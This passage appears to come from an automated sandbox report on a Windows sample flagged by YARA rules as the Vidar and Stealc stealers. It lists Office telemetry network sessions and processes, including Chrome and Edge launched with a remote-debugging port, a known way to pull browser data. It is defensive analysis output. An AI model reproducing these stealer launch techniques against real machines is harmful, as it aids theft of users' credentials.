                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 947c99fd-001e-00a2-4d8c-3ad4d5000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95csp6jmhC1NYCwy6s0000000a10000000008abk
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      144192.168.2.64990013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e2992adc-501e-005b-288c-3ad7f7000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95cjbkr4hC1NYCeu2400000009tg00000000ghkz
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      145192.168.2.64990213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1369
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e9975653-d01e-0065-2d8c-3ab77a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95c5lcmhhC1NYCsnsw0000000a70000000001tte
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      146192.168.2.64990713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1377
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 736e7e4b-801e-0035-118c-3a752a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095437Z-1777c6cb754mrj2shC1TEB6k7w00000009m0000000005mqp
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      147192.168.2.64991113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 107b52fc-c01e-00a2-5b8c-3a2327000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095437Z-r1d97b995777mdbwhC1TEBezag00000008sg000000000q8e
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      148192.168.2.64991413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1372
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f2376ea7-e01e-000c-078c-3a8e36000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095437Z-185f5d8b95cf7qddhC1NYC66an0000000a0000000000hec3
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      149192.168.2.64991313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1409
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 6d467d74-a01e-0050-5286-3adb6e000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095437Z-1777c6cb754lvj6mhC1TEBke9400000009kg000000001mzu
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:37 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:04:54:12
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xba0000
                                                                                                                                                                                                                                                                                      File size:1'806'336 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:7A3B3989F1F3647DC9188A185B345D43
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2588317062.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2220319190.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                      Start time:04:54:21
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                      Start time:04:54:21
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2176,i,8591507833336824045,10004583078600035240,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                      Start time:04:54:30
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                      Start time:04:54:31
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2160,i,16259966090051703333,16306138306425127585,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                      Start time:04:54:31
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
